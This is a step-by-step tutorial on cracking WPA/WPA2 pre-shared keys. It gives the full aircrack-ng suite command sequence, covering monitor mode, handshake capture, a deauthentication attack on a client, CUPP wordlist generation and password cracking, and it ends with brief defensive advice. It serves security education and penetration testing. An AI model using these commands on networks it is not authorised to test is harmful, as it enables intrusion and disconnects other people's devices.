Wi-Fi hacking is often synonymous with WPA/WPA2 PSK attacks, one of the most popular ways hackers attempt to compromise wireless networks. These attacks take advantage of weak pre-shared keys (passwords) by capturing a crucial piece of data known as the 4-way handshake during the network authentication process. Once captured, this data can be cracked using dictionary or brute-force attacks to reveal the network's password. The attack methodology involves several steps, starting from identifying the target network, capturing traffic, and forcing devices on the network to disconnect (using a deauthentication attack), all the way to cracking the captured handshake with tools like aircrack-ng. By generating custom wordlists with tools like CUPP and rsmangler, attackers can tailor their brute-force attempts to the specific target. This guide will walk you through the entire process, detailing the tools, techniques, and commands used, while also explaining how to secure your own network against such attacks.
Understanding how these attacks work is important not just for penetration testers and ethical hackers but for anyone looking to improve their cybersecurity defences. By gaining insight into how attackers operate, you can better protect your own network from vulnerabilities. Now, let's dive into the detailed steps for executing a WPA/WPA2 PSK attack.
Step-by-Step: WPA/WPA2 PSK Attack Methodology
Step 1: Checking Your Wi-Fi Adapter
To start, you need a Wi-Fi adapter that supports monitor mode and packet injection. Without this, you won't be able to capture the traffic needed for a successful attack. First, check if your adapter is available and compatible by running the iwconfig command.
iwconfig
This command will show the available network interfaces. Look for your wireless adapter (often listed as wlan0) and ensure it's recognized.
Step 2: Kill Interfering Processes
To ensure the Wi-Fi adapter can operate in monitor mode, you need to disable any processes that might interfere with it, such as NetworkManager. This step is crucial to ensure a clean and smooth traffic capture.
sudo airmon-ng check kill
This command terminates processes that could interfere with the monitor mode. It will help avoid any conflicts when you try to capture Wi-Fi traffic.
Step 3: Enable Monitor Mode
Once processes have been stopped, you can enable monitor mode on your Wi-Fi adapter. This allows you to listen to all traffic on the specified channel, including traffic that isn't meant for your device.
airmon-ng start wlan0
This command puts your wireless adapter into monitor mode, a prerequisite for capturing data packets from the network.
Step 4: Scan for Available Wi-Fi Networks
With your adapter in monitor mode, the next step is to scan for available Wi-Fi networks and identify your target. You can do this using airodump-ng, which will display all nearby networks along with their encryption types, channels, and other relevant data.
airodump-ng wlan0mon
The output of this command will display a list of all detected Wi-Fi networks. Take note of the BSSID (the MAC address of the router), the channel number, and the ESSID (network name) of the target network.
Step 5: Capture Traffic from the Target Network
Now that you've identified your target network, focus the traffic capture on that specific network. This will help you capture the 4-way handshake during the authentication process when a device connects to the network.
airodump-ng wlan0mon --channel 3 --essid "LESS SECURE WIFI" \
--bssid 5C:A6:E6:[REDACTED] --band bg -w less-secure
In this command:
- --channel 3 tells airodump-ng to focus on channel 3.
- --essid "LESS SECURE WIFI" specifies the target network name.
- --bssid 5C:A6:E6:[REDACTED] is the MAC address of the target access point.
- -w less-secure saves the captured data to a file called less-secure-01.cap.
The goal here is to capture the 4-way handshake when a device connects to the network. To expedite this process, you may need to force a device on the network to reconnect using a deauthentication attack.
Step 6: Deauthenticating Clients
A deauthentication attack is used to disconnect a client from the Wi-Fi network, forcing it to reconnect. When the client reconnects, it will exchange the 4-way handshake, which you can then capture.
aireplay-ng -0 1 -a 5C:A6:E6:[REDACTED] -c 8A:97:20:[REDACTED] wlan0mon
In this command:
- -0 1 sends a single deauthentication packet.
- -a 5C:A6:E6:[REDACTED] is the BSSID of the target AP (router).
- -c 8A:97:20:[REDACTED] is the MAC address of the client to be disconnected.
If the network is not using Management Frame Protection (MFP), this will force the client to reconnect, generating the 4-way handshake. If MFP is enabled, deauthentication attacks will not work, and you’ll need to wait for a client to reconnect naturally.
Step 7: Confirm Handshake Capture
After the client reconnects, you should have captured the 4-way handshake. The .cap file is the most important one for us at this point.
ls -l less-secure-01.cap
This file will contain the handshake data, which is essential for cracking the password.
Step 8: Create a Custom Wordlist Using CUPP
To crack the Wi-Fi password, you need a wordlist. A common tactic is to use CUPP (Common User Password Profiler) to generate a customized wordlist based on user-specific data.
Start by creating a basic wordlist:
cat wordlist.txt
less secure
less-secure.com
wifi
password
secret
Next, run CUPP to expand this wordlist:
cupp -w wordlist.txt
CUPP will generate a more extensive wordlist based on the initial inputs, which will increase your chances of cracking the password.
Step 9: Crack the Password
With the handshake captured and your custom wordlist ready, you can now attempt to crack the password using aircrack-ng.
aircrack-ng -w wordlist.txt.cupp.txt -e "LESS SECURE WIFI" \
-b 5C:A6:E6:[REDACTED] less-secure-01.cap
In this command:
- -w wordlist.txt.cupp.txt specifies the custom wordlist generated by CUPP.
- -e "LESS SECURE WIFI" is the network's ESSID (name).
- -b 5C:A6:E6:[REDACTED] is the BSSID (MAC address) of the target access point.
- less-secure-01.cap is the capture file containing the handshake.
If the password is present in the wordlist, aircrack-ng will display the cracked password.
Step 10: Stop Monitor Mode and Restart Network Services
Once you're done, restore your Wi-Fi adapter to its normal mode and restart any services that were stopped earlier.
1. Stop monitor mode:
airmon-ng stop wlan0mon
2. Restart NetworkManager:
systemctl restart NetworkManager
This will return your network connectivity to normal.
How to Protect Your Network from WPA/WPA2 PSK Attacks
- Use WPA3 Encryption: WPA3 provides much stronger security and is resistant to many of the attacks used against WPA2 networks.
- Strong, Unique Passwords: Avoid common passwords or predictable patterns. Use long, random passwords with a mix of letters, numbers, and symbols.
- Enable MFP (Management Frame Protection): This feature helps protect against deauthentication attacks.
This Article Was Sponsored By: